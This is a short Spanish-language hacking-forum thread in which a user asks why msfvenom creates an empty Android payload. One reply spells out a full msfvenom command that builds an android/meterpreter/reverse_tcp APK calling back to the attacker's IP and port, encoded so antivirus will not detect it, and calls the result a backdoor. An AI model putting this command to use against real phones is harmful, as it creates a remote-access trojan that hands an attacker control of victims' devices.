Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: ceibe en 13 Abril 2016, 13:01 pm



Título: msfvenom...
Publicado por: ceibe en 13 Abril 2016, 13:01 pm
hOla compis ,estoy desde hace unas horas trabajando un poco con metas y utilizando msfvenom para crear un payload para android y me lo crea pero con 0 bytes ,no soy un experto en este tema ,a que se debe?


Título: Re: msfvenom...
Publicado por: kilerpi en 28 Abril 2016, 20:44 pm
Buenos dias amigo :D, bueno en primer lugar debes de saber que el comando msfvenom es la conbinacion de comandos para poder crear un payload en este caso el "android/meterpreter/reverse_tcp" y al mismo tiempo poder ponerle al apk creador un encoder para que el archivo no fuera facil de detectar, intenta este comando en la consola root de tu SO con el que estes trabajando: "msfvenom -p android/meterpreter/reverse_tcp LHOST=aqui pon tu direccion ip LPORT=aqui pon el puerto que vallas a usar -e x86/shikata_ga_nai -f apk >exploit.apk "
Bueno amigo recuerdo quitarle las comillas al comando y una cosa no estoy seguro si el encoder shikata ga nai sirve para android yo supongo que debe de servir pero en caso de que no sirve averigua en internet los encoders disponibles para backdoors android , en si basicamente ese es el comando que debes usar


Título: Re: msfvenom...
Publicado por: GreenArrow77 en 23 Junio 2016, 20:47 pm
msfvenom dejo atras a msfpayload, digamos que msfvenom combina msfpayload (para crear payloads) y msfencode (para encodear los payloads y ofuscar el código), por tanto yo creo que no hace falta incluir la ofuscación "shikata_ga_nai".

si dices que te crea el payload con 0 kb, será problema del msfvenom o de alguna dependencia incumplida o algun fallo en la instalación de metasploit, por tanto, prueba si te deja con otros payloads e introduciendo el comando bien y pues si hay fallos, puedes buscar el error, o reinstalar, comprobando que se monta todo correctamente, saludos!